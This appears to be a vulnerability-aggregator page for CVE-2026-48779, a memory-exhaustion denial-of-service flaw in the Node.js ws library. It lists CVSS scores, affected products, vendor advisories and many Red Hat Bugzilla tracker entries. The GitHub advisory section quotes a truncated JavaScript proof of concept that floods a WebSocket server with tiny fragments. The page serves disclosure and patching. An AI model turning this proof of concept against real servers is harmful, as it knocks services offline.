CVE-2026-48779
published 2026-06-17CVE-2026-48779: ws is an open source WebSocket client and server for Node.js. All versions from 1.1.0 up to (but not including) 5.2.5, from 6.0.0 up to 6.2.4, from 7.0.0 up to…
PriorityP346high7.5CVSS 3.1
AVNACLPRNUINSUCNINAH
EPSS
0.73%
49.4th percentile
ws is an open source WebSocket client and server for Node.js. All versions from 1.1.0 up to (but not including) 5.2.5, from 6.0.0 up to 6.2.4, from 7.0.0 up to 7.5.11, and from 8.0.0 up to 8.21.0 are affected by a memory exhaustion DoS vulnerability. A peer can send a high volume of exceptionally small fragments and data chunks, with modest network traffic, to force the remote peer into allocating and holding structural wrappers that consume far more memory than the default documented message-size limit, leading to process termination due to OOM. This issue has been fixed in versions 5.2.5, 6.2.4, 7.5.11, and 8.21.0.
Affected
74 ranges· showing 25
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| ansible-automation-platform-24 | lightspeed-rhel8 | — | — |
| ansible-automation-platform-25 | lightspeed-rhel8 | — | — |
| ansible-automation-platform-26 | gateway-rhel9 | — | — |
| ansible-automation-platform-26 | lightspeed-rhel9 | — | — |
| ansible-automation-platform-27 | gateway-rhel9 | — | — |
| ansible-automation-platform-27 | lightspeed-rhel9 | — | — |
| ansible-automation-platform | automation-portal | — | — |
| ansible-automation-platform | bootc-automation-portal-rhel9 | — | — |
| apache | thrift | — | — |
| container-native-virtualization | kubevirt-console-plugin | — | — |
| container-native-virtualization | kubevirt-console-plugin-rhel9 | — | — |
| cryostat | cryostat-openshift-console-plugin-rhel9 | — | — |
| debian | ceph | — | — |
| devspaces | code-rhel9 | — | — |
| devspaces | dashboard-rhel9 | — | — |
| discovery | discovery-ui-rhel9 | — | — |
| gatekeeper | gatekeeper-rhel9 | — | — |
| grafana | grafana | — | — |
| odf4 | mcg-core-rhel9 | — | — |
| odf4 | odf-console-rhel9 | — | — |
| openshift-lightspeed | lightspeed-console-plugin-419-rhel9 | — | — |
| openshift-lightspeed | lightspeed-console-plugin-pf5-rhel9 | — | — |
| openshift-lightspeed | lightspeed-console-plugin-rhel9 | — | — |
| openshift-pipelines | pipelines-console-plugin-pf5-rhel9 | — | — |
| openshift-pipelines | pipelines-console-plugin-rhel8 | — | — |
CVSS provenance
nvdv3.17.5HIGHCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
cvelistv5v3.17.5HIGHCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
vendor_redhat7.5HIGH
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Red Hat
ws: ws: Denial of Service via memory exhaustion from small WebSocket fragments
vendor_redhat·2026-06-16·CVSS 7.5
CVE-2026-48779 [HIGH] CWE-1050 ws: ws: Denial of Service via memory exhaustion from small WebSocket fragments
ws: ws: Denial of Service via memory exhaustion from small WebSocket fragments
ws is an open source WebSocket client and server for Node.js. All versions from 1.1.0 up to (but not including) 5.2.5, from 6.0.0 up to 6.2.4, from 7.0.0 up to 7.5.11, and from 8.0.0 up to 8.21.0 are affected by a memory exhaustion DoS vulnerability. A peer can send a high volume of exceptionally small fragments and data chunks, with modest network traffic, to force the remote peer into allocating and holding structural wrappers that consume far more memory than the default documented message-size limit, leading to process termination due to OOM. This issue has been fixed in versions 5.2.5, 6.2.4, 7.5.11, and 8.21.0.
A flaw was found in ws, an open source WebSocket client and server. A remote attacker can expl
CVEList
ws: Memory exhaustion DoS from tiny fragments and data chunks
cvelistv5·2026-06-16·CVSS 7.5
CVE-2026-48779 [HIGH] CWE-400 ws: Memory exhaustion DoS from tiny fragments and data chunks
ws: Memory exhaustion DoS from tiny fragments and data chunks
ws is an open source WebSocket client and server for Node.js. All versions from 1.1.0 up to (but not including) 5.2.5, from 6.0.0 up to 6.2.4, from 7.0.0 up to 7.5.11, and from 8.0.0 up to 8.21.0 are affected by a memory exhaustion DoS vulnerability. A peer can send a high volume of exceptionally small fragments and data chunks, with modest network traffic, to force the remote peer into allocating and holding structural wrappers that consume far more memory than the default documented message-size limit, leading to process termination due to OOM. This issue has been fixed in versions 5.2.5, 6.2.4, 7.5.11, and 8.21.0.
GHSA
ws: Memory exhaustion DoS from tiny fragments and data chunks
ghsa·2026-06-15
CVE-2026-48779 [HIGH] CWE-400 ws: Memory exhaustion DoS from tiny fragments and data chunks
ws: Memory exhaustion DoS from tiny fragments and data chunks
### Impact
A high volume of exceptionally small fragments and data chunks can be sent by a peer, with modest network traffic, to force the remote peer into allocating and holding structural wrappers that consume far more memory than the default documented message-size limit, leading to process termination due to OOM.
### Proof of concept
```js
import { WebSocket, WebSocketServer } from 'ws';
const wss = new WebSocketServer({ port: 0 }, function () {
const data = Buffer.alloc(1);
const options = { fin: false };
const { port } = wss.address();
const ws = new WebSocket(`ws://localhost:${port}`);
ws.on('open', function () {
(function send() {
ws.send(data, options, function (err) {
if (err) return;
send();
});
})();
});
ws.on
No detection rules found.
No public exploits indexed.
Bugzilla
CVE-2026-48779 thrift: ws: Denial of Service via memory exhaustion from small WebSocket fragments [fedora-all]
bugzilla·2026-06-16
CVE-2026-48779 [HIGH] CVE-2026-48779 thrift: ws: Denial of Service via memory exhaustion from small WebSocket fragments [fedora-all]
CVE-2026-48779 thrift: ws: Denial of Service via memory exhaustion from small WebSocket fragments [fedora-all]
Disclaimer: Community trackers are created by Red Hat Product Security team on a best effort basis. Package maintainers are required to ascertain if the flaw indeed affects their package, before starting the update process.
Bugzilla
CVE-2026-48779 forgejo: ws: Denial of Service via memory exhaustion from small WebSocket fragments [fedora-all]
bugzilla·2026-06-16
CVE-2026-48779 [HIGH] CVE-2026-48779 forgejo: ws: Denial of Service via memory exhaustion from small WebSocket fragments [fedora-all]
CVE-2026-48779 forgejo: ws: Denial of Service via memory exhaustion from small WebSocket fragments [fedora-all]
Disclaimer: Community trackers are created by Red Hat Product Security team on a best effort basis. Package maintainers are required to ascertain if the flaw indeed affects their package, before starting the update process.
Bugzilla
CVE-2026-48779 jupyterlab: ws: Denial of Service via memory exhaustion from small WebSocket fragments [fedora-all]
bugzilla·2026-06-16
CVE-2026-48779 [HIGH] CVE-2026-48779 jupyterlab: ws: Denial of Service via memory exhaustion from small WebSocket fragments [fedora-all]
CVE-2026-48779 jupyterlab: ws: Denial of Service via memory exhaustion from small WebSocket fragments [fedora-all]
Disclaimer: Community trackers are created by Red Hat Product Security team on a best effort basis. Package maintainers are required to ascertain if the flaw indeed affects their package, before starting the update process.
Bugzilla
CVE-2026-48779 h3: ws: Denial of Service via memory exhaustion from small WebSocket fragments [fedora-all]
bugzilla·2026-06-16
CVE-2026-48779 [HIGH] CVE-2026-48779 h3: ws: Denial of Service via memory exhaustion from small WebSocket fragments [fedora-all]
CVE-2026-48779 h3: ws: Denial of Service via memory exhaustion from small WebSocket fragments [fedora-all]
Disclaimer: Community trackers are created by Red Hat Product Security team on a best effort basis. Package maintainers are required to ascertain if the flaw indeed affects their package, before starting the update process.
Bugzilla
CVE-2026-48779 pcs: ws: Denial of Service via memory exhaustion from small WebSocket fragments [fedora-all]
bugzilla·2026-06-16
CVE-2026-48779 [HIGH] CVE-2026-48779 pcs: ws: Denial of Service via memory exhaustion from small WebSocket fragments [fedora-all]
CVE-2026-48779 pcs: ws: Denial of Service via memory exhaustion from small WebSocket fragments [fedora-all]
Disclaimer: Community trackers are created by Red Hat Product Security team on a best effort basis. Package maintainers are required to ascertain if the flaw indeed affects their package, before starting the update process.
Bugzilla
CVE-2026-48779 dotnet8.0: ws: Denial of Service via memory exhaustion from small WebSocket fragments [fedora-all]
bugzilla·2026-06-16
CVE-2026-48779 [HIGH] CVE-2026-48779 dotnet8.0: ws: Denial of Service via memory exhaustion from small WebSocket fragments [fedora-all]
CVE-2026-48779 dotnet8.0: ws: Denial of Service via memory exhaustion from small WebSocket fragments [fedora-all]
Disclaimer: Community trackers are created by Red Hat Product Security team on a best effort basis. Package maintainers are required to ascertain if the flaw indeed affects their package, before starting the update process.
Bugzilla
CVE-2026-48779 ws: ws: Denial of Service via memory exhaustion from small WebSocket fragments
bugzilla·2026-06-16
CVE-2026-48779 [HIGH] CVE-2026-48779 ws: ws: Denial of Service via memory exhaustion from small WebSocket fragments
CVE-2026-48779 ws: ws: Denial of Service via memory exhaustion from small WebSocket fragments
ws is an open source WebSocket client and server for Node.js. All versions from 1.1.0 up to (but not including) 5.2.5, from 6.0.0 up to 6.2.4, from 7.0.0 up to 7.5.11, and from 8.0.0 up to 8.21.0 are affected by a memory exhaustion DoS vulnerability. A peer can send a high volume of exceptionally small fragments and data chunks, with modest network traffic, to force the remote peer into allocating and holding structural wrappers that consume far more memory than the default documented message-size limit, leading to process termination due to OOM. This issue has been fixed in versions 5.2.5, 6.2.4, 7.5.11, and 8.21.0.
Discussion:
There is no impact of this CVE on pcs-web-ui installations in prod
Bugzilla
CVE-2026-48779 python-ipyparallel: ws: Denial of Service via memory exhaustion from small WebSocket fragments [epel-all]
bugzilla·2026-06-16
CVE-2026-48779 [HIGH] CVE-2026-48779 python-ipyparallel: ws: Denial of Service via memory exhaustion from small WebSocket fragments [epel-all]
CVE-2026-48779 python-ipyparallel: ws: Denial of Service via memory exhaustion from small WebSocket fragments [epel-all]
Disclaimer: Community trackers are created by Red Hat Product Security team on a best effort basis. Package maintainers are required to ascertain if the flaw indeed affects their package, before starting the update process.
Bugzilla
CVE-2026-48779 thrift: ws: Denial of Service via memory exhaustion from small WebSocket fragments [epel-all]
bugzilla·2026-06-16
CVE-2026-48779 [HIGH] CVE-2026-48779 thrift: ws: Denial of Service via memory exhaustion from small WebSocket fragments [epel-all]
CVE-2026-48779 thrift: ws: Denial of Service via memory exhaustion from small WebSocket fragments [epel-all]
Disclaimer: Community trackers are created by Red Hat Product Security team on a best effort basis. Package maintainers are required to ascertain if the flaw indeed affects their package, before starting the update process.
Bugzilla
CVE-2026-48779 yarnpkg: ws: Denial of Service via memory exhaustion from small WebSocket fragments [fedora-all]
bugzilla·2026-06-16
CVE-2026-48779 [HIGH] CVE-2026-48779 yarnpkg: ws: Denial of Service via memory exhaustion from small WebSocket fragments [fedora-all]
CVE-2026-48779 yarnpkg: ws: Denial of Service via memory exhaustion from small WebSocket fragments [fedora-all]
Disclaimer: Community trackers are created by Red Hat Product Security team on a best effort basis. Package maintainers are required to ascertain if the flaw indeed affects their package, before starting the update process.
Bugzilla
CVE-2026-48779 qt6-qtwebengine: ws: Denial of Service via memory exhaustion from small WebSocket fragments [epel-all]
bugzilla·2026-06-16
CVE-2026-48779 [HIGH] CVE-2026-48779 qt6-qtwebengine: ws: Denial of Service via memory exhaustion from small WebSocket fragments [epel-all]
CVE-2026-48779 qt6-qtwebengine: ws: Denial of Service via memory exhaustion from small WebSocket fragments [epel-all]
Disclaimer: Community trackers are created by Red Hat Product Security team on a best effort basis. Package maintainers are required to ascertain if the flaw indeed affects their package, before starting the update process.
Bugzilla
CVE-2026-48779 golang-github-apache-beam-2: ws: Denial of Service via memory exhaustion from small WebSocket fragments [fedora-all]
bugzilla·2026-06-16
CVE-2026-48779 [HIGH] CVE-2026-48779 golang-github-apache-beam-2: ws: Denial of Service via memory exhaustion from small WebSocket fragments [fedora-all]
CVE-2026-48779 golang-github-apache-beam-2: ws: Denial of Service via memory exhaustion from small WebSocket fragments [fedora-all]
Disclaimer: Community trackers are created by Red Hat Product Security team on a best effort basis. Package maintainers are required to ascertain if the flaw indeed affects their package, before starting the update process.
Bugzilla
CVE-2026-48779 python-jupytext: ws: Denial of Service via memory exhaustion from small WebSocket fragments [fedora-all]
bugzilla·2026-06-16
CVE-2026-48779 [HIGH] CVE-2026-48779 python-jupytext: ws: Denial of Service via memory exhaustion from small WebSocket fragments [fedora-all]
CVE-2026-48779 python-jupytext: ws: Denial of Service via memory exhaustion from small WebSocket fragments [fedora-all]
Disclaimer: Community trackers are created by Red Hat Product Security team on a best effort basis. Package maintainers are required to ascertain if the flaw indeed affects their package, before starting the update process.
Bugzilla
CVE-2026-48779 fbthrift: ws: Denial of Service via memory exhaustion from small WebSocket fragments [epel-all]
bugzilla·2026-06-16
CVE-2026-48779 [HIGH] CVE-2026-48779 fbthrift: ws: Denial of Service via memory exhaustion from small WebSocket fragments [epel-all]
CVE-2026-48779 fbthrift: ws: Denial of Service via memory exhaustion from small WebSocket fragments [epel-all]
Disclaimer: Community trackers are created by Red Hat Product Security team on a best effort basis. Package maintainers are required to ascertain if the flaw indeed affects their package, before starting the update process.
Bugzilla
CVE-2026-48779 jupyterlab: ws: Denial of Service via memory exhaustion from small WebSocket fragments [epel-all]
bugzilla·2026-06-16
CVE-2026-48779 [HIGH] CVE-2026-48779 jupyterlab: ws: Denial of Service via memory exhaustion from small WebSocket fragments [epel-all]
CVE-2026-48779 jupyterlab: ws: Denial of Service via memory exhaustion from small WebSocket fragments [epel-all]
Disclaimer: Community trackers are created by Red Hat Product Security team on a best effort basis. Package maintainers are required to ascertain if the flaw indeed affects their package, before starting the update process.
Bugzilla
CVE-2026-48779 openbao: ws: Denial of Service via memory exhaustion from small WebSocket fragments [epel-all]
bugzilla·2026-06-16
CVE-2026-48779 [HIGH] CVE-2026-48779 openbao: ws: Denial of Service via memory exhaustion from small WebSocket fragments [epel-all]
CVE-2026-48779 openbao: ws: Denial of Service via memory exhaustion from small WebSocket fragments [epel-all]
Disclaimer: Community trackers are created by Red Hat Product Security team on a best effort basis. Package maintainers are required to ascertain if the flaw indeed affects their package, before starting the update process.
Bugzilla
CVE-2026-48779 yarnpkg: ws: Denial of Service via memory exhaustion from small WebSocket fragments [epel-all]
bugzilla·2026-06-16
CVE-2026-48779 [HIGH] CVE-2026-48779 yarnpkg: ws: Denial of Service via memory exhaustion from small WebSocket fragments [epel-all]
CVE-2026-48779 yarnpkg: ws: Denial of Service via memory exhaustion from small WebSocket fragments [epel-all]
Disclaimer: Community trackers are created by Red Hat Product Security team on a best effort basis. Package maintainers are required to ascertain if the flaw indeed affects their package, before starting the update process.
Bugzilla
CVE-2026-48779 nodejs-aw-webui: ws: Denial of Service via memory exhaustion from small WebSocket fragments [fedora-all]
bugzilla·2026-06-16
CVE-2026-48779 [HIGH] CVE-2026-48779 nodejs-aw-webui: ws: Denial of Service via memory exhaustion from small WebSocket fragments [fedora-all]
CVE-2026-48779 nodejs-aw-webui: ws: Denial of Service via memory exhaustion from small WebSocket fragments [fedora-all]
Disclaimer: Community trackers are created by Red Hat Product Security team on a best effort basis. Package maintainers are required to ascertain if the flaw indeed affects their package, before starting the update process.
Bugzilla
CVE-2026-48779 fcitx5: ws: Denial of Service via memory exhaustion from small WebSocket fragments [fedora-all]
bugzilla·2026-06-16
CVE-2026-48779 [HIGH] CVE-2026-48779 fcitx5: ws: Denial of Service via memory exhaustion from small WebSocket fragments [fedora-all]
CVE-2026-48779 fcitx5: ws: Denial of Service via memory exhaustion from small WebSocket fragments [fedora-all]
Disclaimer: Community trackers are created by Red Hat Product Security team on a best effort basis. Package maintainers are required to ascertain if the flaw indeed affects their package, before starting the update process.
Bugzilla
CVE-2026-48779 cachelib: ws: Denial of Service via memory exhaustion from small WebSocket fragments [epel-all]
bugzilla·2026-06-16
CVE-2026-48779 [HIGH] CVE-2026-48779 cachelib: ws: Denial of Service via memory exhaustion from small WebSocket fragments [epel-all]
CVE-2026-48779 cachelib: ws: Denial of Service via memory exhaustion from small WebSocket fragments [epel-all]
Disclaimer: Community trackers are created by Red Hat Product Security team on a best effort basis. Package maintainers are required to ascertain if the flaw indeed affects their package, before starting the update process.
Bugzilla
CVE-2026-48779 seamonkey: ws: Denial of Service via memory exhaustion from small WebSocket fragments [fedora-all]
bugzilla·2026-06-16
CVE-2026-48779 [HIGH] CVE-2026-48779 seamonkey: ws: Denial of Service via memory exhaustion from small WebSocket fragments [fedora-all]
CVE-2026-48779 seamonkey: ws: Denial of Service via memory exhaustion from small WebSocket fragments [fedora-all]
Disclaimer: Community trackers are created by Red Hat Product Security team on a best effort basis. Package maintainers are required to ascertain if the flaw indeed affects their package, before starting the update process.
Discussion:
SeaMonkey does not use npm ws now.
Bugzilla
CVE-2026-48779 fbthrift: ws: Denial of Service via memory exhaustion from small WebSocket fragments [fedora-all]
bugzilla·2026-06-16
CVE-2026-48779 [HIGH] CVE-2026-48779 fbthrift: ws: Denial of Service via memory exhaustion from small WebSocket fragments [fedora-all]
CVE-2026-48779 fbthrift: ws: Denial of Service via memory exhaustion from small WebSocket fragments [fedora-all]
Disclaimer: Community trackers are created by Red Hat Product Security team on a best effort basis. Package maintainers are required to ascertain if the flaw indeed affects their package, before starting the update process.
Bugzilla
CVE-2026-48779 openbao: ws: Denial of Service via memory exhaustion from small WebSocket fragments [fedora-all]
bugzilla·2026-06-16
CVE-2026-48779 [HIGH] CVE-2026-48779 openbao: ws: Denial of Service via memory exhaustion from small WebSocket fragments [fedora-all]
CVE-2026-48779 openbao: ws: Denial of Service via memory exhaustion from small WebSocket fragments [fedora-all]
Disclaimer: Community trackers are created by Red Hat Product Security team on a best effort basis. Package maintainers are required to ascertain if the flaw indeed affects their package, before starting the update process.
Bugzilla
CVE-2026-48779 magicmirror: ws: Denial of Service via memory exhaustion from small WebSocket fragments [epel-all]
bugzilla·2026-06-16
CVE-2026-48779 [HIGH] CVE-2026-48779 magicmirror: ws: Denial of Service via memory exhaustion from small WebSocket fragments [epel-all]
CVE-2026-48779 magicmirror: ws: Denial of Service via memory exhaustion from small WebSocket fragments [epel-all]
Disclaimer: Community trackers are created by Red Hat Product Security team on a best effort basis. Package maintainers are required to ascertain if the flaw indeed affects their package, before starting the update process.
Bugzilla
CVE-2026-48779 seamonkey: ws: Denial of Service via memory exhaustion from small WebSocket fragments [epel-all]
bugzilla·2026-06-16
CVE-2026-48779 [HIGH] CVE-2026-48779 seamonkey: ws: Denial of Service via memory exhaustion from small WebSocket fragments [epel-all]
CVE-2026-48779 seamonkey: ws: Denial of Service via memory exhaustion from small WebSocket fragments [epel-all]
Disclaimer: Community trackers are created by Red Hat Product Security team on a best effort basis. Package maintainers are required to ascertain if the flaw indeed affects their package, before starting the update process.
Discussion:
SeaMonkey does not use npm ws now.
Bugzilla
CVE-2026-48779 magicmirror: ws: Denial of Service via memory exhaustion from small WebSocket fragments [fedora-all]
bugzilla·2026-06-16
CVE-2026-48779 [HIGH] CVE-2026-48779 magicmirror: ws: Denial of Service via memory exhaustion from small WebSocket fragments [fedora-all]
CVE-2026-48779 magicmirror: ws: Denial of Service via memory exhaustion from small WebSocket fragments [fedora-all]
Disclaimer: Community trackers are created by Red Hat Product Security team on a best effort basis. Package maintainers are required to ascertain if the flaw indeed affects their package, before starting the update process.
Bugzilla
CVE-2026-48779 qt5-qtwebengine: ws: Denial of Service via memory exhaustion from small WebSocket fragments [fedora-all]
bugzilla·2026-06-16
CVE-2026-48779 [HIGH] CVE-2026-48779 qt5-qtwebengine: ws: Denial of Service via memory exhaustion from small WebSocket fragments [fedora-all]
CVE-2026-48779 qt5-qtwebengine: ws: Denial of Service via memory exhaustion from small WebSocket fragments [fedora-all]
Disclaimer: Community trackers are created by Red Hat Product Security team on a best effort basis. Package maintainers are required to ascertain if the flaw indeed affects their package, before starting the update process.
Bugzilla
CVE-2026-48779 onnxruntime: ws: Denial of Service via memory exhaustion from small WebSocket fragments [fedora-all]
bugzilla·2026-06-16
CVE-2026-48779 [HIGH] CVE-2026-48779 onnxruntime: ws: Denial of Service via memory exhaustion from small WebSocket fragments [fedora-all]
CVE-2026-48779 onnxruntime: ws: Denial of Service via memory exhaustion from small WebSocket fragments [fedora-all]
Disclaimer: Community trackers are created by Red Hat Product Security team on a best effort basis. Package maintainers are required to ascertain if the flaw indeed affects their package, before starting the update process.
Bugzilla
CVE-2026-48779 python-jupyterlab_pygments: ws: Denial of Service via memory exhaustion from small WebSocket fragments [fedora-all]
bugzilla·2026-06-16
CVE-2026-48779 [HIGH] CVE-2026-48779 python-jupyterlab_pygments: ws: Denial of Service via memory exhaustion from small WebSocket fragments [fedora-all]
CVE-2026-48779 python-jupyterlab_pygments: ws: Denial of Service via memory exhaustion from small WebSocket fragments [fedora-all]
Disclaimer: Community trackers are created by Red Hat Product Security team on a best effort basis. Package maintainers are required to ascertain if the flaw indeed affects their package, before starting the update process.
Bugzilla
CVE-2026-48779 magicmirror-module-onthisday: ws: Denial of Service via memory exhaustion from small WebSocket fragments [fedora-all]
bugzilla·2026-06-16
CVE-2026-48779 [HIGH] CVE-2026-48779 magicmirror-module-onthisday: ws: Denial of Service via memory exhaustion from small WebSocket fragments [fedora-all]
CVE-2026-48779 magicmirror-module-onthisday: ws: Denial of Service via memory exhaustion from small WebSocket fragments [fedora-all]
Disclaimer: Community trackers are created by Red Hat Product Security team on a best effort basis. Package maintainers are required to ascertain if the flaw indeed affects their package, before starting the update process.
Bugzilla
CVE-2026-48779 python-jupyterlab_pygments: ws: Denial of Service via memory exhaustion from small WebSocket fragments [epel-all]
bugzilla·2026-06-16
CVE-2026-48779 [HIGH] CVE-2026-48779 python-jupyterlab_pygments: ws: Denial of Service via memory exhaustion from small WebSocket fragments [epel-all]
CVE-2026-48779 python-jupyterlab_pygments: ws: Denial of Service via memory exhaustion from small WebSocket fragments [epel-all]
Disclaimer: Community trackers are created by Red Hat Product Security team on a best effort basis. Package maintainers are required to ascertain if the flaw indeed affects their package, before starting the update process.
Bugzilla
CVE-2026-48779 mozjs78: ws: Denial of Service via memory exhaustion from small WebSocket fragments [epel-all]
bugzilla·2026-06-16
CVE-2026-48779 [HIGH] CVE-2026-48779 mozjs78: ws: Denial of Service via memory exhaustion from small WebSocket fragments [epel-all]
CVE-2026-48779 mozjs78: ws: Denial of Service via memory exhaustion from small WebSocket fragments [epel-all]
Disclaimer: Community trackers are created by Red Hat Product Security team on a best effort basis. Package maintainers are required to ascertain if the flaw indeed affects their package, before starting the update process.
Bugzilla
CVE-2026-48779 rust: ws: Denial of Service via memory exhaustion from small WebSocket fragments [fedora-all]
bugzilla·2026-06-16
CVE-2026-48779 [HIGH] CVE-2026-48779 rust: ws: Denial of Service via memory exhaustion from small WebSocket fragments [fedora-all]
CVE-2026-48779 rust: ws: Denial of Service via memory exhaustion from small WebSocket fragments [fedora-all]
Disclaimer: Community trackers are created by Red Hat Product Security team on a best effort basis. Package maintainers are required to ascertain if the flaw indeed affects their package, before starting the update process.
Bugzilla
CVE-2026-48779 python-ipyparallel: ws: Denial of Service via memory exhaustion from small WebSocket fragments [fedora-all]
bugzilla·2026-06-16
CVE-2026-48779 [HIGH] CVE-2026-48779 python-ipyparallel: ws: Denial of Service via memory exhaustion from small WebSocket fragments [fedora-all]
CVE-2026-48779 python-ipyparallel: ws: Denial of Service via memory exhaustion from small WebSocket fragments [fedora-all]
Disclaimer: Community trackers are created by Red Hat Product Security team on a best effort basis. Package maintainers are required to ascertain if the flaw indeed affects their package, before starting the update process.
Bugzilla
CVE-2026-48779 cachelib: ws: Denial of Service via memory exhaustion from small WebSocket fragments [fedora-all]
bugzilla·2026-06-16
CVE-2026-48779 [HIGH] CVE-2026-48779 cachelib: ws: Denial of Service via memory exhaustion from small WebSocket fragments [fedora-all]
CVE-2026-48779 cachelib: ws: Denial of Service via memory exhaustion from small WebSocket fragments [fedora-all]
Disclaimer: Community trackers are created by Red Hat Product Security team on a best effort basis. Package maintainers are required to ascertain if the flaw indeed affects their package, before starting the update process.
https://github.com/websockets/ws/commit/86d3e8a5fb0246ed373860c5fbb0de88824a27f7https://github.com/websockets/ws/commit/b5372ac67bb97a773727b8e9f5035a8123556d53https://github.com/websockets/ws/commit/bca91adf15677e47dbe4f959653452727be28b94https://github.com/websockets/ws/commit/fd36cd864fcdf62a08273a99e19a7d975401fee8https://github.com/websockets/ws/security/advisories/GHSA-96hv-2xvq-fx4phttps://access.redhat.com/errata/RHSA-2026:29197https://access.redhat.com/errata/RHSA-2026:33155https://access.redhat.com/errata/RHSA-2026:33160https://access.redhat.com/errata/RHSA-2026:33163https://access.redhat.com/errata/RHSA-2026:33173https://access.redhat.com/errata/RHSA-2026:33183https://access.redhat.com/security/cve/CVE-2026-48779https://bugzilla.redhat.com/show_bug.cgi?id=2489661https://github.com/websockets/ws/security/advisories/GHSA-96hv-2xvq-fx4phttps://security.access.redhat.com/data/csaf/v2/vex/2026/cve-2026-48779.json
2026-06-17
Published